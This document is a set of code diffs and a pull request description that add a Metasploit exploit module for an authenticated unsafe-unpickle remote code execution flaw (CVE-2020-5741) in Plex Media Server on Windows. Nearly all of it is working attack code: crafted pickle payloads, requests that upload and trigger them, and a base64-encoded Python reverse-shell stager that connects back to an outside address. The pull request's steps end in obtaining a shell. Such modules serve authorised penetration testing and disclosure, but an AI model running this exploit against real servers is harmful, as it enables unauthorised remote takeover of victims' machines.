-          'X-Plex-Token'=> datastore['PLEX_TOKEN'],
-        },
+          'X-Plex-Token' => datastore['PLEX_TOKEN']
+        }
     )
   end
 
-  def get_server_info
+  def ret_server_info
     print_status('Gathering Plex Config')
     res = send_request_cgi(
       'uri' => '/',
-      'headers' => {'X-Plex-Token'=> datastore['PLEX_TOKEN']},
+      'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] }
     )
     unless res && res.code == 200
       return nil
     end
+
     return Hash.from_xml(res.body)
   end
 
   def check
-    server = get_server_info
+    server = ret_server_info
     if server.nil?
       return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
     end
@@ -210,12 +217,11 @@ class MetasploitModule < Msf::Exploit::Remote
     store_loot('plex.json', 'application/json', datastore['RHOST'], server.to_s, 'plex.json', 'Plex Server Configuration')
 
     report_host({
-         :host => datastore['RHOST'],
-         :os_name => server['MediaContainer']['platform'],
-         :os_flavor => server['MediaContainer']['platformVersion']
-        })
-    print_status("Server Name: #{server['MediaContainer']['friendlyName']}")   
-    print_status("Server Owner: #{server['MediaContainer']['myPlexUsername']}")
+      host: datastore['RHOST'],
+      os_name: server['MediaContainer']['platform'],
+      os_flavor: server['MediaContainer']['platformVersion']
+    })
+    print_status("Server Name: #{server['MediaContainer']['friendlyName']}")
     unless server['MediaContainer']['platform'] == 'Windows'
       print_bad("Server OS: #{server['MediaContainer']['platform']} (#{server['MediaContainer']['platformVersion']})")
       return CheckCode::Safe('Only Windows OS is exploitable')
@@ -224,28 +230,32 @@ class MetasploitModule < Msf::Exploit::Remote
     v = Gem::Version.new(server['MediaContainer']['version'])
     if v >= Gem::Version.new('1.19.3')
       print_bad("Server Version: #{v}")
-      return CheckCode::Safe("Only < 1.19.3 is exploitable")
+      return CheckCode::Safe('Only < 1.19.3 is exploitable')
     end
     print_good("Server Version: #{server['MediaContainer']['version']}")
     CheckCode::Vulnerable
   end
 
   def exploit
+    if datastore['PLEX_TOKEN'].blank?
+      fail_with(Failure::BadConfig, 'PLEX_TOKEN is required.')
+    end
+
     unless check == CheckCode::Vulnerable
-      fail_with(Failure::NotVulnerable,'Server not vulnerable')
+      fail_with(Failure::NotVulnerable, 'Server not vulnerable')
     end
 
     id = create_photo_library
     if id.nil?
-      fail_with(Failure::UnexpectedReply,'Unable to create photo library, possible permission problem')    
+      fail_with(Failure::UnexpectedReply, 'Unable to create photo library, possible permission problem')
     end
     print_good("Created Photo Library: #{id}")
     add_pickle(id)
     change_apppath("#{datastore['LIBRARY_PATH']}\\#{album_name}")
     restart_plex
-    print_status('Sleeping 10 seconds for server restart')
-    Rex::sleep(10)
-    print_status('Reverting changes')
+    print_status("Sleeping #{datastore['REBOOT_SLEEP']} seconds for server restart")
+    Rex.sleep(datastore['REBOOT_SLEEP'])
+    print_status('Cleanup Phase: Reverting changes from exploitation')
     change_apppath('')
     restart_plex
     delete_photo_library(id)

--- a/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
@@ -132,7 +132,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # e = EvilPickle()
     # pickle.dumps(e)
 
-    p = "\x80\x02cnt\nsystem\nq\x00U\x1f#{datastore['LIBRARY_PATH']}\\#{album_name}\\Dict.batq\x01\x85q\x02Rq\x03."
+    path = "#{datastore['LIBRARY_PATH']}\\#{album_name}\\Dict.bat"
+    # thanks to acammack for the help here on the payload length
+    p = "\x80\x02cnt\nsystem\nq\x00U#{[path.length].pack('C')}#{path}q\x01\x85q\x02Rq\x03."
     filename = "#{album_name}/Plex Media Server/Plug-in Support/Data/com.plexapp.system/"
 
     u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"

--- a/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
@@ -36,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py'],
             ['URL', 'https://www.tenable.com/security/research/tra-2020-32'],
             ['URL', 'http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/'],
+            ['URL', 'https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819'],
             ['CVE', '2020-5741']
           ],
         'Platform' => ['windows'],

--- a/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
@@ -18,12 +18,11 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits an authenticated Python unsafe pickle.load of a Dict file.  An authenticated attacker
           can create a photo library and add arbitrary files to it.  After setting the Windows only Plex variable
           LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes
-          an RCE as the user who started Plex.  Due to the restrictions of pickle RCE, we write our payload to a file
-          then simply execute it through the pickled Dict file.
+          an RCE as the user who started Plex.
           Plex_Token is required, to get it you need to log-in through a web browser, then check the requests to grab
-          the X-Plex-Token header.
-          If an exploit fails, or is cancelled, Dict and Dict.bat are left on disk, a new ALBUM_NAME will be required
-          as subsuquent writes will make Dict-1 and Dict-1.bat, and not execute.
+          the X-Plex-Token header.  See info -d for additional details.
+          If an exploit fails, or is cancelled, Dict is left on disk, a new ALBUM_NAME will be required
+          as subsuquent writes will make Dict-1, and not execute.
         },
         'License' => MSF_LICENSE,
         'Author' =>
@@ -39,11 +38,11 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819'],
             ['CVE', '2020-5741']
           ],
-        'Platform' => ['windows'],
+        'Platform' => ['python'],
         'Privileged' => false,
-        'Arch' => [ARCH_CMD],
+        'Arch' => [ARCH_PYTHON],
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/windows/reverse_powershell' # only payload that seemed to work at all...
+          'PAYLOAD' => 'python/meterpreter/reverse_tcp'
         },
         'Notes' => {
           'Stability' => [CRASH_SERVICE_RESTARTS], # we reboot the server twice
@@ -108,33 +107,33 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def add_pickle(location)
     print_status('Adding pickled Dict to library')
-    # pickle dump of os.system of a path with Dict.bat at the end.  MUST BE GENERATED ON WINDOWS
-    # generating on *nix will use posix, and fail on target.
-    # the path is arbitrary as it gets replaced
-    # This method is fragile.  After reviewing several examples, and write-ups, I wasn't
-    # able to get this working with more than 1 function call, and any spaces.  Not sure
-    # if the problem is the pickling, unpickling, or plex.  POC didn't would work with a
-    # trailing space, but no 2nd option.  To circumvent all this, we write our payload to
-    # Dict.bat, and just call it directly.
-
+    # This is the pickle code, generated on windows to ensure no cross platform
+    # issues were encountered
     #######
-    # python
+    # python (2.7 ships with Plex)
     #######
     # import pickle
-    # import os
     #
-    # class EvilPickle(object):
-    #  def __init__(self):
-    #    pass
-    #  def __reduce__(self):
-    #    return (os.system,('c:\\Users\\Public\\mememe\\Dict.bat',))
+    # class EP(object):
+    #    def __init__(self):
+    #        pass
+    #    def __reduce__(self):
+    #        # for generating an approximately correct size and content, we use
+    #        # msfvenom -p python/meterpreter/reverse_tcp LPORT=9999 LHOST=192.168.0.1
+    #        # that payload is then added after runsource.
+    #        # The original pre-meterp return would be
+    #        # return (eval, ("__import__('code').InteractiveInterpreter().runsource(, '<input>', 'exec')",))
+    #        return (eval, ("__import__('code').InteractiveInterpreter().runsource(\"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4xJyw5OTk5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')[0]))\", '<input>', 'exec')",))
     #
-    # e = EvilPickle()
+    # e = EP()
     # pickle.dumps(e)
 
-    path = "#{datastore['LIBRARY_PATH']}\\#{album_name}\\Dict.bat"
-    # thanks to acammack for the help here on the payload length
-    p = "\x80\x02cnt\nsystem\nq\x00U#{[path.length].pack('C')}#{path}q\x01\x85q\x02Rq\x03."
+    # The output from that command will look similar to the following:
+    # 'c__builtin__\neval\np0\n(S\'__import__(\\\'code\\\').InteractiveInterpreter().runsource("exec(__import__(\\\'base64\\\').b64decode(__import__(\\\'codecs\\\').getencoder(\\\'utf-8\\\')(\\\'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4xJyw5OTk5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==\\\')[0]))", \\\'<input>\\\', \\\'exec\\\')\'\np1\ntp2\nRp3\n.'
+
+    p = %|c__builtin__\neval\np0\n(S\'|
+    p << %|__import__('code').InteractiveInterpreter().runsource("#{payload.encoded}", '<input>', 'exec')|.gsub("'", "\'")
+    p << %(\'\np1\ntp2\nRp3\n.) # rubocop changed the | to ( which to not match the last 2 lines...
     filename = "#{album_name}/Plex Media Server/Plug-in Support/Data/com.plexapp.system/"
 
     u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"
@@ -146,25 +145,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/octet-stream',
       'data' => p
     )
-    register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/', '\\\\')}Dict")
-
     if res && res.code == 401
       fail_with(Failure::UnexpectedReply, 'Permission denied when attempting to upload file.  Plex server may not be registered to an account or you lack permission.')
       delete_photo_library(location)
       return false
     end
-
-    print_status('Adding payload to library root')
-    filename = "#{album_name}/"
-    u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"
-    res = send_request_raw(
-      'method' => 'POST',
-      'uri' => "/library/metadata?#{u}Dict.bat", # Dict-1
-      'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] },
-      'ctype' => 'application/octet-stream',
-      'data' => payload.encoded
-    )
-    register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/', '\\\\')}Dict.bat")
+    # Deleting the file (even with a PrependFork) tended to kill the session or make it unreliable
+    # register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/', '\\\\')}Dict")
 
     if res && res.code == 401
       fail_with(Failure::UnexpectedReply, 'Permission denied when attempting to upload file.  Plex server may not be registered to an account or you lack permission.')
@@ -249,6 +236,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe('Only < 1.19.3 is exploitable')
     end
     print_good("Server Version: #{server['MediaContainer']['version']}")
+    unless server['MediaContainer']['allowCameraUpload']
+      print_bad("Camera Upload: #{server['MediaContainer']['allowCameraUpload']}")
+      return CheckCode::Safe('Camera Upload not enabled')
+    end
+    print_good("Camera Upload: #{server['MediaContainer']['allowCameraUpload']}")
     CheckCode::Vulnerable
   end
 
@@ -261,6 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Server not vulnerable')
     end
 
+    print_status("Using album name: #{album_name}")
     id = create_photo_library
     if id.nil?
       fail_with(Failure::UnexpectedReply, 'Unable to create photo library, possible permission problem')

--- a/modules/exploits/windows/http/plex_unpickle_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_rce.rb
@@ -1,0 +1,235 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        # The Name should be just like the line of a Git commit - software name,
+        # vuln type, class. Preferably apply
+        # some search optimization so people can actually find the module.
+        # We encourage consistency between module name and file name.
+        'Name'           => 'Plex Unpickle Windows RCE',
+        'Description'    => %q(
+            This exploit module illustrates how a vulnerability could be exploited
+          in a webapp.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die', # msf module
+            'Chris Lyne' # discovery, POC
+          ],
+        'References'     =>
+          [
+            [ 'URL', 'https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py'],
+            [ 'URL', 'https://www.tenable.com/security/research/tra-2020-32'],
+            [ 'CVE', '2020-5741']
+          ],
+        # platform refers to the type of platform.  For webapps, this is typically the language of the webapp.
+        # js, php, python, nodejs are common, this will effect what payloads can be matched for the exploit.
+        # A full list is available in lib/msf/core/payload/uuid.rb
+        'Platform'       => ['windows'],
+        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
+        'Privileged'     => false,
+        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but for webapps typically
+        # this is the application language. ARCH_PYTHON, ARCH_PHP, ARCH_JAVA are some examples
+        # A full list is available in lib/msf/core/payload/uuid.rb
+        'Arch'           => ARCH_CMD,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => "Apr 1 2013",
+        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
+        # It's generally easiest just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget'  => 0
+      )
+    )
+    # set the default port, and a URI that a user can set if the app isn't installed to the root
+    register_options(
+      [
+        Opt::RPORT(32400),
+        OptString.new('PLEX_TOKEN', [ true, 'Admin Authenticated X-Plex-Token', '']),
+        OptString.new('LIBRARY_PATH', [ true, 'Path to write picture library to', 'C:\\Users\\Public']),
+        OptString.new('ALBUM_NAME', [ true, 'Name of Album', 'mememe'])
+      ]
+    )
+  end
+
+  def album_name
+    if @album_name.nil?
+      @album_name = datastore['ALBUM_NAME'].blank? ? rand_text_alphanumeric(6..12) : datastore['ALBUM_NAME']
+    end
+    @album_name
+  end
+
+  def create_photo_library
+    print_status('Adding new photo library')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/library/sections',
+      'headers' =>
+        {
+          'X-Plex-Token'=> datastore['PLEX_TOKEN'],
+          'Accept' => 'application/json'
+        },
+      'vars_get' => 
+        {
+          'name'=>album_name, #rand_text_alphanumeric(6..12),
+          'language'=>'en',
+          'agent'=>'com.plexapp.agents.none',
+          'location'=> datastore['LIBRARY_PATH'],
+          'type'=>'photo',
+          'scanner'=>'Plex Photo Scanner'
+        }
+    )
+    # response:
+    # {"MediaContainer":{"size":1,"Directory":[{"art":"/:/resources/photo-fanart.jpg","composite":"/library/sections/-1/composite/1592441414","thumb":"/:/resources/photo.png","key":"7","type":"photo","title":"EvilLib2","agent":"com.plexapp.agents.none","scanner":"Plex Photo Scanner","language":"en","uuid":"95d3810f-8be0-497c-b6d4-170050f7ab30","updatedAt":1592441414,"createdAt":1592441414,"enableAutoPhotoTags":false,"content":true,"directory":true,"contentChangedAt":5135637678740750690,"Location":[{"id":7,"path":"C:\\Users\\Public"}]}]}}
+    # we need to pull ['MediaContainer']['Directory']['key']
+    if res && res.code == 201 # 201 == Created
+      return res.get_json_document['MediaContainer']['Directory'][0]['key']
+    end
+    nil
+  end
+
+  def add_pickle(location)
+    print_status('Adding evil Dict to library')
+    # os.system('PATH\\Dict.bat') from python pickle
+    p = "\x80\x02cnt\nsystem\nq\x00U\x1fc:\\Users\\Public\\mememe\\Dict.batq\x01\x85q\x02Rq\x03."
+    filename = "#{album_name}/Plex Media Server/Plug-in Support/Data/com.plexapp.system/"
+
+    #p.gsub!('PATH', "#{datastore['LIBRARY_PATH']}\\#{filename}")
+    #p.gsub!('/','\\')
+
+    File.open('/tmp/msf.pickle', 'w') {|file| file.write(p)}
+    u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"
+    # using raw here because the encodings for the filename got really wacky when using CGI
+    send_request_raw(
+      'method' => 'POST',
+      'uri' => "/library/metadata?#{u}Dict",
+      'headers' => {'X-Plex-Token'=> datastore['PLEX_TOKEN']},
+      'ctype' => 'application/octet-stream',
+      'data' => p
+    )
+    filename = "#{album_name}/"
+    u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"
+    send_request_raw(
+      'method' => 'POST',
+      'uri' => "/library/metadata?#{u}Dict.bat", # Dict-1
+      'headers' => {'X-Plex-Token'=> datastore['PLEX_TOKEN']},
+      'ctype' => 'application/octet-stream',
+      'data' => payload.encoded
+    )
+
+  end
+
+  def change_apppath(path) 
+    print_status('Changing AppPath')
+    send_request_cgi(
+      'method' => 'PUT',  
+      'uri' => '/:/prefs',
+      'vars_get' =>
+        {
+          'X-Plex-Token'=> datastore['PLEX_TOKEN'],
+          'LocalAppDataPath'=>path,#'C\x\Users\Public\myalbum',
+        },
+    )
+  end
+
+  def restart_plex
+    print_status('Restarting Plex')
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/:/plugins/com.plexapp.system/restart',
+      'vars_get' =>
+        {
+          'X-Plex-Token'=> datastore['PLEX_TOKEN'],
+        },
+    )
+  end
+
+  def delete_photo_library(library)
+    print_status('Deleting Photo Library')
+    send_request_cgi(
+      'method' => 'DELETE',
+      'uri' => "/library/sections/#{library}",
+      'vars_get' =>
+        {
+          'X-Plex-Token'=> datastore['PLEX_TOKEN'],
+        },
+    )
+  end
+
+  def get_server_info
+    print_status('Gathering Plex Config')
+    res = send_request_cgi(
+      'uri' => '/',
+      'headers' => {'X-Plex-Token'=> datastore['PLEX_TOKEN']},
+    )
+    unless res && res.code == 200
+      return nil
+    end
+    return Hash.from_xml(res.body)
+  end
+
+  def check
+    server = get_server_info
+    if server.nil?
+      return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
+    end
+
+    store_loot('plex.json', 'application/json', datastore['RHOST'], server.to_s, 'plex.json', 'Plex Server Configuration')
+
+    report_host({
+         :host => datastore['RHOST'],
+         :os_name => server['MediaContainer']['platform'],
+         :os_flavor => server['MediaContainer']['platformVersion']
+        })
+    print_status("Server Name: #{server['MediaContainer']['friendlyName']}")   
+    print_status("Server Owner: #{server['MediaContainer']['myPlexUsername']}")
+    unless server['MediaContainer']['platform'] == 'Windows'
+      print_bad("Server OS: #{server['MediaContainer']['platform']} (#{server['MediaContainer']['platformVersion']})")
+      return CheckCode::Safe('Only Windows OS is exploitable')
+    end
+    print_good("Server OS: #{server['MediaContainer']['platform']} (#{server['MediaContainer']['platformVersion']})")
+    v = Gem::Version.new(server['MediaContainer']['version'])
+    if v >= Gem::Version.new('1.19.3')
+      print_bad("Server Version: #{v}")
+      return CheckCode::Safe("Only < 1.19.3 is exploitable")
+    end
+    print_good("Server Version: #{server['MediaContainer']['version']}")
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable,'Server not vulnerable')
+    end
+
+    id = create_photo_library
+    if id.nil?
+      fail_with(Failure::UnexpectedReply,'Unable to create photo library, possible permission problem')    
+    end
+    print_good("Created Photo Library: #{id}")
+    add_pickle(id)
+    change_apppath("#{datastore['LIBRARY_PATH']}\\#{album_name}")
+    Rex::sleep(20)
+    restart_plex
+    print_status('Sleeping 15 seconds for server restart')
+    Rex::sleep(15)
+    print_status('Reverting changes')
+    change_apppath('')
+    restart_plex
+    delete_photo_library(id)
+
+  end
+end

--- a/modules/exploits/windows/http/plex_unpickle_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_rce.rb
@@ -7,19 +7,23 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        # The Name should be just like the line of a Git commit - software name,
-        # vuln type, class. Preferably apply
-        # some search optimization so people can actually find the module.
-        # We encourage consistency between module name and file name.
-        'Name'           => 'Plex Unpickle Windows RCE',
+        'Name'           => 'Plex Unpickle Dict Windows RCE',
         'Description'    => %q(
-            This exploit module illustrates how a vulnerability could be exploited
-          in a webapp.
+            This module exploits an authenticated Python unsafe pickle.load of a Dict file.  An authenticated attacker
+          can create a photo library and add arbitrary files to it.  After setting the Windows only Plex variable 
+          LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes
+          an RCE as the user who started Plex.  Due to the restrictions of pickle RCE, we write our payload to a file
+          then simply execute it through the pickled Dict file.
+          Plex_Token is required, to get it you need to log-in through a web browser, then check the requests to grab
+          the X-Plex-Token header.
+          If an exploit fails, or is cancelled, Dict and Dict.bat are left on disk, a new ALBUM_NAME will be required
+          as subsuquent writes will make Dict-1 and Dict-1.bat, and not execute.
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -29,38 +33,36 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'References'     =>
           [
-            [ 'URL', 'https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py'],
-            [ 'URL', 'https://www.tenable.com/security/research/tra-2020-32'],
-            [ 'CVE', '2020-5741']
+            ['URL', 'https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py'],
+            ['URL', 'https://www.tenable.com/security/research/tra-2020-32'],
+            ['URL', 'http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/'],
+            ['CVE', '2020-5741']
           ],
-        # platform refers to the type of platform.  For webapps, this is typically the language of the webapp.
-        # js, php, python, nodejs are common, this will effect what payloads can be matched for the exploit.
-        # A full list is available in lib/msf/core/payload/uuid.rb
         'Platform'       => ['windows'],
-        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
         'Privileged'     => false,
-        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but for webapps typically
-        # this is the application language. ARCH_PYTHON, ARCH_PHP, ARCH_JAVA are some examples
-        # A full list is available in lib/msf/core/payload/uuid.rb
-        'Arch'           => ARCH_CMD,
+        'Arch'           => [ARCH_CMD],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/windows/reverse_powershell'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS], # we reboot the server twice
+          'Reliability' => [REPEATABLE_SESSION, CONFIG_CHANGES], # we attempt to revert config changes
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        },
         'Targets'        =>
           [
             [ 'Automatic Target', {}]
           ],
-        'DisclosureDate' => "Apr 1 2013",
-        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
-        # It's generally easiest just to put the default at the beginning of the list and skip this
-        # entirely.
+        'DisclosureDate' => "May 7 2020",
         'DefaultTarget'  => 0
       )
     )
-    # set the default port, and a URI that a user can set if the app isn't installed to the root
     register_options(
       [
         Opt::RPORT(32400),
         OptString.new('PLEX_TOKEN', [ true, 'Admin Authenticated X-Plex-Token', '']),
         OptString.new('LIBRARY_PATH', [ true, 'Path to write picture library to', 'C:\\Users\\Public']),
-        OptString.new('ALBUM_NAME', [ true, 'Name of Album', 'mememe'])
+        OptString.new('ALBUM_NAME', [ true, 'Name of Album', ''])
       ]
     )
   end
@@ -84,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'vars_get' => 
         {
-          'name'=>album_name, #rand_text_alphanumeric(6..12),
+          'name'=>album_name,
           'language'=>'en',
           'agent'=>'com.plexapp.agents.none',
           'location'=> datastore['LIBRARY_PATH'],
@@ -94,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     # response:
     # {"MediaContainer":{"size":1,"Directory":[{"art":"/:/resources/photo-fanart.jpg","composite":"/library/sections/-1/composite/1592441414","thumb":"/:/resources/photo.png","key":"7","type":"photo","title":"EvilLib2","agent":"com.plexapp.agents.none","scanner":"Plex Photo Scanner","language":"en","uuid":"95d3810f-8be0-497c-b6d4-170050f7ab30","updatedAt":1592441414,"createdAt":1592441414,"enableAutoPhotoTags":false,"content":true,"directory":true,"contentChangedAt":5135637678740750690,"Location":[{"id":7,"path":"C:\\Users\\Public"}]}]}}
-    # we need to pull ['MediaContainer']['Directory']['key']
+    # we need to pull ['MediaContainer']['Directory'][0]['key']
     if res && res.code == 201 # 201 == Created
       return res.get_json_document['MediaContainer']['Directory'][0]['key']
     end
@@ -103,14 +105,28 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def add_pickle(location)
     print_status('Adding evil Dict to library')
-    # os.system('PATH\\Dict.bat') from python pickle
-    p = "\x80\x02cnt\nsystem\nq\x00U\x1fc:\\Users\\Public\\mememe\\Dict.batq\x01\x85q\x02Rq\x03."
+    # pickle dump of os.system of a path with Dict.bat at the end.  MUST BE GENERATED ON WINDOWS
+    # generating on *nix will use posix, and fail on target.
+    # the path is arbitrary as it gets replaced
+
+    #######
+    # python
+    #######
+    #import pickle
+    #import os
+    #
+    #class EvilPickle(object):
+    #  def __init__(self):
+    #    pass
+    #  def __reduce__(self):
+    #    return (os.system,('c:\\Users\\Public\\mememe\\Dict.bat',))
+    #
+    #e = EvilPickle()
+    #pickle.dumps(e)
+
+    p = "\x80\x02cnt\nsystem\nq\x00U\x1f#{datastore['LIBRARY_PATH']}\\#{album_name}\\Dict.batq\x01\x85q\x02Rq\x03."
     filename = "#{album_name}/Plex Media Server/Plug-in Support/Data/com.plexapp.system/"
 
-    #p.gsub!('PATH', "#{datastore['LIBRARY_PATH']}\\#{filename}")
-    #p.gsub!('/','\\')
-
-    File.open('/tmp/msf.pickle', 'w') {|file| file.write(p)}
     u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"
     # using raw here because the encodings for the filename got really wacky when using CGI
     send_request_raw(
@@ -120,6 +136,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/octet-stream',
       'data' => p
     )
+    register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/','\\\\')}Dict")
+
+    print_status('Adding payload to library root')
     filename = "#{album_name}/"
     u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"
     send_request_raw(
@@ -129,6 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/octet-stream',
       'data' => payload.encoded
     )
+    register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/','\\\\')}Dict.bat")
 
   end
 
@@ -140,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' =>
         {
           'X-Plex-Token'=> datastore['PLEX_TOKEN'],
-          'LocalAppDataPath'=>path,#'C\x\Users\Public\myalbum',
+          'LocalAppDataPath'=>path,
         },
     )
   end
@@ -222,14 +242,12 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Created Photo Library: #{id}")
     add_pickle(id)
     change_apppath("#{datastore['LIBRARY_PATH']}\\#{album_name}")
-    Rex::sleep(20)
     restart_plex
-    print_status('Sleeping 15 seconds for server restart')
-    Rex::sleep(15)
+    print_status('Sleeping 10 seconds for server restart')
+    Rex::sleep(10)
     print_status('Reverting changes')
     change_apppath('')
     restart_plex
     delete_photo_library(id)
-
   end
 end


### PR DESCRIPTION
This PR adds an exploit against Plex for Windows.  An authenticated user can create a new photo library, and upload a python pickled `Dict` file.  After setting an advanced hidden variable and rebooting the plex service, the `Dict` file is unpickled (and executed).  We use this to then call our payload file.  RCE.

## Verification
  1. Install the application
  2. Register/Connect it to your Plex Pass account
  3. Start msfconsole
  4. Do: ```use windows/http/plex_unpickle_dict_rce```
  5. Do: ```run```
  6. You should get a shell.

